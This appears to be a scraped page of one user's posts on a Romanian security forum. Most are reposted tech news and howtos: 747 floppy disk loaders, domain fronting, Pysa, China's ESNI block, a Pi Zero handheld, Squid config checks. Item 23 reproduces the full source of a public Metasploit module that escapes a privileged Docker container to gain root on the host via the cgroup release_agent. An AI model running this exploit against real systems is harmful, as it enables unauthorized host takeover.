  14. Nu i-am dat mura-n gura, sunt surse full pt ce cauta el iar tu ce spui, parabolice pe 100 de m intreaba aici https://www.hamradioforum.net/forums/41-Antennas
  15. tu vrei sa faci "floarea Soarelui" ai pe aici sa te inspiri
  16. dude, am fost sa dau un interviu la un post TV, cand am vazut ce mizerii fac, am vomitat pe tastatura ON: SEO pe nisa respectiva PS: chiar daca e din 14 T/C
  17. Industry binning old aircraft is an opportunity for aviation infosec DEF CON Boeing 747-400s still use floppy disks for loading critical navigation databases, Pen Test Partners has revealed to the infosec community after poking about one of the recently abandoned aircraft. The eye-catching factoid emerged during a DEF CON video interview of PTP's Alex Lomas, where the man himself gave a walkthrough of a 747-400, its avionics bay and the flight deck. Although airliners are not normally available to curious infosec researchers, a certain UK-based Big Airline's decision to scrap its B747 fleet gave Pen Test Partners a unique opportunity to get aboard one and have a poke about before the scrap merchants set about their grim task. While giving a tour of the aircraft on video (full embed below), Lomas pointed out the navigation database loader. To readers of a certain vintage it'll look very familiar indeed. Navigation data aboard Boeing 747-436 airliners is updated via a 3.5" floppy drive. The aircraft were built in the late 1990s A quick tour of the avionics bay, buried beneath the floor of the lower passenger deck, revealed a server-room-esque array of line replaceable units and cabling, prompting Lomas to bust lots of Hollywood-grade dreams by saying: "You can't just clip into a pair of wires into the back of the aircraft and gain access to all of these." In a subsequent Q&A for DEF CON's virtual attendees (this year's hacking conference was done remotely thanks to COVID-19), Pen Test Partners chief Ken Munro asked Lomas about points of interest to aviation infosec researchers. The latter then described various aviation-specific ARINC equipment and connectivity standards, including ARINC 664 ("...Ethernet with some extra quality-of-service layers on top to make sure flight-critical things can talk to each other") as used in the Boeing 787 and the latest generation of airliners, ARINC 629 ("really only used in the [Boeing] 777"), and other potential areas of research interest including VxWorks' real-time OS, which is used in a number of airliners' internal networks. The key question everyone wants to know the answer to, though, is whether you can hack an airliner from the cheap seats, using the in-flight entertainment (IFE) as an attack vector. Lomas observed: That hasn't stopped some people from trying, most notably an infosec researcher from a Scottish university who deployed a well-known pentesting technique against IFE equipment at the start of a nine-hour transatlantic flight. Mercifully he only managed to KO his own screen. There is a long and storied history of otherwise obsolete technologies being retained in use because they're built into something bigger and yet work well, not least aboard Royal Navy survey ship HMS Enterprise. Last seen in these hallowed pages a couple of years ago when the Navy invited your correspondent aboard the warship during a NATO exercise in Norway, Enterprise's hotchpotch of Windows ME-based survey software is now helping port authorities in Beirut assess the damage caused by the disastrous ammonium nitrate explosion earlier this month. ® Bootnote Of potential interest to researchers who don't have access to a spare 747 for a spot of pentesting is the new Microsoft Flight Simulator. Due for release in just over a week, the latest version of the classic sim franchise will include and support the use of ARINC 429-compatible navigation datasets, of the exact same type loaded into the 747 on a 3.5" floppy. While the fidelity of the simulator software reading and executing that data may not be comparable with the real thing, inexpensive access to a real dataset can offer insights into further research areas – though the tale of the Boeing 787 and Warsaw's BIMPA 4U arrival is unlikely to be repeatable. Via theregister.com
  18. Domain fronting, the technique of circumventing internet censorship and monitoring by obfuscating the domain of an HTTPS connection was killed by major cloud providers in April of 2018. However, with the arrival of TLS 1.3, new technologies enable a new kind of domain fronting. This time, network monitoring and internet censorship tools are able to be fooled on multiple levels. This talk will give an overview of what domain fronting is, how it used to work, how TLS 1.3 enables a new form of domain fronting, and what it looks like to network monitoring. You can circumvent censorship and monitoring today without modifying your tools using an open source TCP and UDP pluggable transport tool that will be released alongside this talk. Source
      • 2
      • Upvote
  19. Facebook has announced the availability of Pysa (Python Static Analyzer), an open-source tool designed for the static analysis of Python code. The security-focused tool relies on Pyre, Facebook’s type checker for Python, and allows for the analysis of how data flows through code. It can be used to identify issues related to the protection of user data, as well as flaws such as XSS and SQL injection. In addition to making Pysa available in open source, Facebook released many of the definitions that it leverages when looking for security bugs, making it readily available for others to start analyzing their own Python code. The tool also leverages open source Python server frameworks, including Django and Tornado, and this makes it usable for code analysis right from the start. Furthermore, only few lines of code are needed to use Pysa for additional frameworks, Facebook says. Pysa allows users to define sources of origin for important data and places where that data should not reach, which are called sinks. The tool then identifies functions that return data from a source and those that reach a sink and, if it discovers a connection between a source and a sink, it reports the issue. The tool was designed in such a manner that it avoids false negatives, thus supposedly identifying as many security issues as possible. This, however, results in more false positives, and, to remove these as well, Facebook’s engineers added sanitizers and features into the tool. The social media platform admits that Pysa has its limitations “based on its choice to address security issues related to data flow, together with design decisions that trade off performance for precision and accuracy.” Furthermore, Pysa was designed only for the discovery of data flow–related security issues, meaning that it won’t identify security or privacy issues that cannot be modeled as flows of data. Although nearly half of the results returned in the timeframe were false positives, Facebook was able to tune Pysa up, and says that it eventually returned “100 percent valid issues.” Via securityweek.com
  20. Here's another iteration on the Zero Terminal projects I've been working on for a few years. For those of you who haven't seen them, I've been trying to design the most usable all in one Pi Zero computer out there. This version departs a little from the previous ones, as it is more focused on modularity, and forgoes a keyboard as standard, though it is possible to add one, as I'll show you in a bit. The goal here was to create something very versatile, allowing for all sorts of use cases to unlock the Zero's potential. Anyways, let's take a look at it. DESIGN The first thing you'll notice is that the device looks a little like a fat smartphone. That's because the entire thing is basically designed around the Waveshare AMOLED 5.5" 1080p touchscreen (https://www.waveshare.com/5.5inch-HDMI-AMOLED.htm). This thing was originally designed for the Raspberry Pi's 3 and 4, but I created a bunch of custom adaptors that let you hook up a Pi Zero instead. More on that in a minute. Around the outside, you'll see various ports and buttons, including a full size USB 2.0 port, micro SD socket for the operating system, micro USB for charging and a power switch. On the side there is a headphone jack, and 3 programmable buttons hooked up to the Zeros GPIO pins. You could set up all sorts of functions for these, like rotating the screen, volume up and down, or launching other custom scripts and applications with a single press. On the top end is another button which turns the display off and on, helping stretch out the 1200mAh lipo battery life, and also a grill hiding a little speaker behind it. The back of the device is where all the potential lies. This includes 2 40pin sockets which connect to both the GPIO pins, video out, camera connector, 2x USB ports, power indicators and more. The idea is to allow people to create and add custom backpacks to change the functionality, depending on their needs. INTERNALS In order to connect the Zero to the display in the smallest possible space, I created a main PCB, and a few smaller adaptor PCBs. The Zero itself is screwed onto the board and soldered directly to it via the GPIO pins. This main board contains a USB hub, power circuit, audio amp, speaker, buttons, headphone jack, and even a vibration motor for custom notifications. There's a micro SD card board plugged into the Zero which extends the card socket, and also doubles as a frame for the other ports at the bottom of the device. The Waveshare display already has some mounting screws, so securing the main board is easy. There's a little header section to connect the display to the main board, and you simply screw everything together. I included 6 threaded inserts onto this board to make attaching different cases simple too. The Zero only has 1 USB port as standard, so I designed a little USB hub circuit on the main board, using the simple FE1.1S chip. This splits the USB port into 4 separate streams, and is good enough for lower consumption stuff like mice and keyboards, as well as the displays touchscreen capability. You'd probably need to hook up external 5v lines for more power hungry peripherals. I'm particularly pleased with the HDMI adaptor, which connects the full size HDMI port on the display to the mini HDMI port of the Zero. I was wracking my brains for a long time on how to connect these in the smallest possible way, and it turns out using two thin PCBs sandwiched together allows this, since you can solder to both the HDMI-A plug component which takes a 1.6mm PCB, and the smaller Mini HDMI plug, which only takes up to 1mm boards. The power section is something I had trouble with. It's based on the Powerboost 1000c design, and was supposed to fit directly onto the main board, but a couple of the small ICs where too fiddly for me to hand solder and I damaged them before making this video. I would have just included the Powerboost board itself, but unfortunately there's not enough room. Instead I used a cheap generic charge boost board, which is fine for this prototype, but doesn't have all the extra features such as low battery indicators, and a better power switch circuit. That'll be for the next iteration. The Zero doesn't come with audio as standard, but thankfully the Waveshare display does have a built in headphone jack for audio through HDMI. So I wondered if I added an audio amp circuit to the pins on the headphone jack, whether I could power a small speaker, and yes it works. Unfortunately, not very well though, but it's good enough for stuff like bleeps and bloops for notification sounds. Audio through the headphones sounds great though, and I added my own jack in there so it's accessible from the outside of the case. This particular jack has a mechanical switch which defaults to the speakers, and automatically switches to headphones whenever the 3.5mm plug is inserted. ADD-ONS As I previously mentioned, I think the backpack feature of this is where you really see the potential of the device. I can imagine all sorts of different backpacks that could transform the functionality of this. Things like radio transceivers, extra network interfaces, games controllers, TV tuners, solar panels, and simple stands are all easily doable. The cool thing is that since it's modular you can swap these on the fly to change the functionality, so say you could change between a keyboard & radio transceiver combo for a packet radio messenger, then replace that with a different operating system on the micro SD card, and add a game controller to turn it into a portable emulator. The first prototype backpack I have created is a slide-out keyboard. When you combine that with i3 window manager, you have quite the productive handheld Linux machine. Even though the Zero isn't the most powerful computer, you can still get a lot done through the terminal since it uses up a fraction of the resources that a GUI does. The design is based on the great mini (Pi)QWERTY keyboard by Bobricius on Hackaday (hackaday.io/project/158454), and uses a SAMD21 chip to turn it into a USB input device. It's made using 3 PCB layers. Firstly, the bottom, which contains the electronic components and keys, then a cover PCB which displays the key labels, then another board that connects all that to the terminal. The slide mechanism is made up of 3D printed supports and tiny screws, and while it does slide, it needs extra work to make it more robust. The bottom layer connects to the top using little spring loaded pins. I've also added a couple of LEDs you can toggle on and off when you're in low light. The final thing is surprisingly thin, at only a few millimetres deep. Although I think it looks good, I haven't gotten it working properly yet. I've talked to Bob about the design, and I think it's solid. The problem appears to be with the chip programmer I'm using to get the firmware onto it. It's one of the cheap ones, and seems to be giving me false verification messages. Anyways, you get the idea of how it could make the Zero Terminal a pretty handy little device. I also created another custom mini keyboard stand, this time using a salvaged Psion 5MX keyboard, which is still probably one of the best small keyboards ever designed. I used a premade PSION keyboard to USB adaptor that you can find on Tindie, and the thing is open source so you can make you're own too. It wouldn't be much of a stretch to go even further to develop a full adaptor case which would turn it into a Palmtop computer, with working hinge, and maybe a bigger secondary battery and USB hub. NEXT STEPS I have registered ZeroTerminal.org, which is currently redirecting to this page. Over the next year, as I update the design, I want to make a website to help build up the platform, showing people exactly how to make these, and showcasing all the backpacks and custom apps other users create. In the meantime I want to redo the main PCB, change up some components like the rubbish speaker, redesign the power circuit etc, maybe even experiment with using the Raspberry Pi Compute Module instead. Long term it'd be amazing to design a custom display board, then the entire device could be shrunken further, closer to smartphone size. Anyways, I hope you found this interesting. I know I have a lot to learn about all this kind of stuff, so any advice from experts is welcome. Please share this video around if you think others will like it. Thanks and I'll see you in the next video. -- This project first appeared in NODE Vol 02, our new indepedent 180 page zine, packed with all sorts of open hardware and decentralized software projects. Pick up a hard copy, or download for free from the zine page. https://N-O-D-E.net/zine/ Source
      • 1
      • Upvote
  21. Wherever you changed or updated the Squid proxy server, you should verify that your squid.conf file is error-free. It is an easy task. To check the squid.conf file for any syntax errors and warnings type the following commands. Test or check your Squid proxy server configuration file for Errors Open the Terminal Window and then type the following command. For remote Linux and Unix server login using the ssh command: $ ssh vivek@server1.cyberciti.biz Now run the following command as root user: Sample session: 2020/08/08 08:16:42| Startup: Initializing Authentication Schemes ... 2020/08/08 08:16:42| Startup: Initialized Authentication Scheme 'basic' 2020/08/08 08:16:42| Startup: Initialized Authentication Scheme 'digest' 2020/08/08 08:16:42| Startup: Initialized Authentication Scheme 'negotiate' 2020/08/08 08:16:42| Startup: Initialized Authentication Scheme 'ntlm' 2020/08/08 08:16:42| Startup: Initialized Authentication. 2020/08/08 08:16:42| Processing Configuration File: /etc/squid/squid.conf (depth 0) 2020/08/08 08:16:42| Processing: acl mylan src 10.8.0.0/24 2020/08/08 08:16:42| Processing: acl mylan src 172.16.0.0/24 2020/08/08 08:16:42| Processing: acl SSL_ports port 443 2020/08/08 08:16:42| Processing: acl Safe_ports port 80 # http 2020/08/08 08:16:42| Processing: acl Safe_ports port 21 # ftp 2020/08/08 08:16:42| Processing: acl Safe_ports port 443 # https 2020/08/08 08:16:42| Processing: acl Safe_ports port 70 # gopher 2020/08/08 08:16:42| Processing: acl Safe_ports port 210 # wais 2020/08/08 08:16:42| Processing: acl Safe_ports port 1025-65535 # unregistered ports 2020/08/08 08:16:42| Processing: acl Safe_ports port 280 # http-mgmt 2020/08/08 08:16:42| Processing: acl Safe_ports port 488 # gss-http 2020/08/08 08:16:42| Processing: acl Safe_ports port 591 # filemaker 2020/08/08 08:16:42| Processing: acl Safe_ports port 777 # multiling http 2020/08/08 08:16:42| Processing: acl CONNECT method CONNECT 2020/08/08 08:16:42| Processing: http_access deny !Safe_ports 2020/08/08 08:16:42| Processing: http_access deny CONNECT !SSL_ports 2020/08/08 08:16:42| Processing: http_access allow localhost manager 2020/08/08 08:16:42| Processing: http_access deny manager 2020/08/08 08:16:42| Processing: http_access allow localhost 2020/08/08 08:16:42| Processing: http_access allow mylan 2020/08/08 08:16:42| Processing: http_access deny all 2020/08/08 08:16:42| Processing: http_port 10.8.0.1:3128 2020/08/08 08:16:42| Processing: dns_v4_first on 2020/08/08 08:16:42| Processing: tcp_outgoing_address 13.xxx.yyy.zzz 2020/08/08 08:16:42| Processing: cache_mem 256 MB 2020/08/08 08:16:42| Processing: cache_dir diskd /var/spool/squid 1024 16 256 Q1=72 Q2=64 2020/08/08 08:16:42| Processing: access_log daemon:/var/log/squid/access.log squid 2020/08/08 08:16:42| Processing: coredump_dir /var/spool/squid 2020/08/08 08:16:42| Processing: refresh_pattern ^ftp: 1440 20% 10080 2020/08/08 08:16:42| Processing: refresh_pattern ^gopher: 1440 0% 1440 2020/08/08 08:16:42| Processing: refresh_pattern -i (/cgi-bin/|\?) 0 0% 0 2020/08/08 08:16:42| Processing: refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880 2020/08/08 08:16:42| Processing: refresh_pattern . 0 20% 4320 2020/08/08 08:16:42| Processing: forwarded_for delete 2020/08/08 08:16:42| Processing: via off 2020/08/08 08:16:42| Processing: forwarded_for off 2020/08/08 08:16:42| Processing: follow_x_forwarded_for deny all 2020/08/08 08:16:42| Processing: request_header_access X-Forwarded-For deny all 2020/08/08 08:16:42| Processing: forwarded_for delete 2020/08/08 08:16:42| Processing: dns_nameservers 10.8.0.1 2020/08/08 08:16:42| WARNING: HTTP requires the use of Via 2020/08/08 08:16:42| Initializing https:// proxy context Example of error reported when we do Squid check config file for syntax errors # squid -k parse 2020/08/08 08:21:07| Processing: viaproxy off 2020/08/08 08:21:07| /etc/squid/squid.conf:40 unrecognized: 'viaproxy' Edit the config file and fix that error: # vim +40 /etc/squid/squid.conf Find: viaproxy off Replace with: via off Save and close the file. Now test it again: # squid -k parse Now we can reload our squid proxy server without restarting squid daemon as follows: # squid -k reconfigure How to syntax check the squid configuration file It is always good to run a ‘squid -k parse‘ and ‘squid -k debug‘ commands to check config syntax error whenever you change your configuration for the proxy server. Please note that Squid refused to start if it detects an error. Hence, we need to make sure there are no errors when the server reboots for kernel updates. If an error exists, Squid will remain down till sysadmin fix syntax errors. Other useful Squid proxy options The syntax is: # squid -k command OR $ sudo squid -k command Where command can be any one of the following: reconfigure : Sends a HUP signal to Squid to re-read its configuration files. rotate : Rotate log files. shutdown : Sends a TERM signal to Squid to wait briefly for current connections to finish and then shutdown server. The amount of time to wait is specified with shutdown_lifetime options in squid.conf file. restart : Restart the server interrupt : Sends an INT signal to Squid server. It shutdown immediately, without waiting for current connections. kill : Kill proxy server by sending a KILL signal. debug : Run squid in full debugging mode. check : Sends a “ZERO” signal to the Squid server. This simply checks whether or not the server/process is actually running on your Linux/Unix/BSD box. parse : Parses the squid.conf file for syntax errors. Conclusion You learned how to parse Squid proxy server configuration file, then send signal to running copy and exit to the CLI. This is useful to test or check for syntax errors in squid.conf and other files. See Squid Proxy server documents for more information. Source
  22. The block was put in place at the end of July and is enforced via China's Great Firewall. The Chinese government has deployed an update to its national censorship tool, known as the Great Firewall (GFW), to block encrypted HTTPS connections that are being set up using modern, interception-proof protocols and technologies. The ban has been in place for at least a week, since the end of July, according to a joint report published this week by three organizations tracking Chinese censorship -- iYouPort, the University of Maryland, and the Great Firewall Report. CHINA NOW BLOCKING HTTPS+TLS1.3+ESNI Through the new GFW update, Chinese officials are only targeting HTTPS traffic that is being set up with new technologies like TLS 1.3 and ESNI (Encrypted Server Name Indication). Other HTTPS traffic is still allowed through the Great Firewall, if it uses older versions of the same protocols -- such as TLS 1.1 or 1.2, or SNI (Server Name Indication). For HTTPS connections set up via these older protocols, Chinese censors can infer to what domain a user is trying to connect. This is done by looking at the (plaintext) SNI field in the early stages of an HTTPS connections. In HTTPS connections set up via the newer TLS 1.3, the SNI field can be hidden via ESNI, the encrypted version of the old SNI. As TLS 1.3 usage continues to grow around the web, HTTPS traffic where TLS 1.3 and ESNI is used is now giving Chinese sensors headaches, as they're now finding it harder to filter HTTPS traffic and control what content the Chinese population can access. Image: Qualys SSL Labs (via SixGen) Per the findings of the joint report, the Chinese government is currently dropping all HTTPS traffic where TLS 1.3 and ESNI are used, and temporarily banning the IP addresses involved in the connection, for small intervals of time that can vary between two and three minutes. SOME CIRCUMVENTION METHODS EXIST... FOR NOW For now, iYouPort, the University of Maryland, and the Great Firewall Report said they were able to find six circumvention techniques that can be applied client-side (inside apps and software) and four that can be applied server-side (on servers and app backends) to bypass the GFW's current block. ZDNet also confirmed the report's findings with two additional sources -- namely members of a US telecommunications provider and an internet exchange point (IXP) -- using instructions provided in this mailing list Via zdnet.com.
  23. This Metasploit module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: --cap-add=SYS_ADMIN, --privileged. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # POC modified from https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/ class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, { 'Name' => 'Docker Privileged Container Escape', 'Description' => %q{ This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`. }, 'License' => MSF_LICENSE, 'Author' => ['stealthcopter'], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE], 'Targets' => [['Automatic', {}]], 'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 }, 'SessionTypes' => ['shell', 'meterpreter'], 'DefaultTarget' => 0, 'References' => [ ['EDB', '47147'], ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'], ['URL', 'https://github.com/stealthcopter/deepce'] ], 'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm } ) ) register_advanced_options( [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]), OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']), OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']), ] ) end def base_dir_container datastore['WritableContainerDir'].to_s end def base_dir_host datastore['WritableHostDir'].to_s end # Get the container id and check it's the expected 64 char hex string, otherwise return nil def container_id id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp unless id.match(/\A[\h]{64}\z/).nil? id end end # Check we have all the prerequisites to perform the escape def check # are in a docker container unless file?('/.dockerenv') return CheckCode::Safe('Not inside a Docker container') end # is root user unless is_root? return Exploit::CheckCode::Safe('Exploit requires root inside container') end # are rdma files present in /sys/ path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1') unless path.start_with? '/' return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.') end CheckCode::Appears('Inside Docker container and target appears vulnerable') end def exploit unless writable? base_dir_container fail_with Failure::BadConfig, "#{base_dir_container} is not writable" end pl = generate_payload_exe exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}" print_status("Writing payload executable to '#{exe_path}'") upload_and_chmodx(exe_path, pl) register_file_for_cleanup(exe_path) print_status('Executing script to exploit privileged container') script = shell_script(exe_path) vprint_status("Script: #{script}") print_status(cmd_exec(script)) print_status "Waiting #{datastore['WfsDelay']}s for payload" end def shell_script(payload_path) # The tricky bit is finding the payload on the host machine in order to execute it. The options here are # 1. Find the file on the host operating system `find /var/lib/docker/overlay2/ -name 'JGsgvlU' -exec {} \;` # 2. Copy the payload out of the container and execute it `docker cp containerid:/tmp/JGsgvlU /tmp/JGsgvlU && /tmp/JGsgvlU` id = container_id filename = File.basename(payload_path) vprint_status("container id #{id}") # If we cant find the id, or user requested it, search for the payload on the filesystem rather than copying it out of container if id.nil? || datastore['ForcePayloadSearch'] # We couldn't find a container name, lets try and find the payload on the filesystem and then execute it print_status('Searching for payload on host') command = "find /var/lib/docker/overlay2/ -name '#{filename}' -exec {} \\;" else # We found a container id, copy the payload to host, then execute it payload_path_host = "#{base_dir_host}/#{filename}" print_status("Found container id #{container_id}, copying payload to host") command = "docker cp #{id}:#{payload_path} #{payload_path_host}; #{payload_path_host}" end vprint_status(command) # the cow variables are random filenames to use for the exploit c = rand_text_alpha(6..8) o = rand_text_alpha(6..8) w = rand_text_alpha(6..8) %{ d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)") mkdir -p "$d/#{w}" echo 1 >"$d/#{w}/notify_on_release" t="$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)" touch /#{o} echo "$t/#{c}" >"$d/release_agent" printf "#!/bin/sh\\n%s > %s/#{o}" "#{command}" "$t">/#{c} chmod +x /#{c} sh -c "echo 0 >$d/#{w}/cgroup.procs" sleep 1 cat /#{o} rm /#{c} /#{o} }.strip.split("\n").map(&:strip).join(';') end end Source
      • 1
      • Upvote
  24. Kev

    LeakIX

    About LeakIX This project goes around the internet and finds services to index them. 3 scopes Services In this scope we grab the banners from open services and make them available for search in the service scope. Webapp Coming soon. Leaks In this scope we inspect found services for weak credentials, meaning : No credentials Weak credentials, widely used by botnets ( eg: root:root, admin:admin, 123456 ) No databases/service data are actually stored, we do keep table names + time the leak happened. URL: https://leakix.net Via OSINT
      • 1
      • Upvote
  25. Kev

    COVID-19

    De acord, nu ramaneau telefoanele/clipurile dacã era sa fie prãpãd Totuși refrenul din 2004 spune multe: YT: Profethu - Protest ( 2004 )
×
×
  • Create New...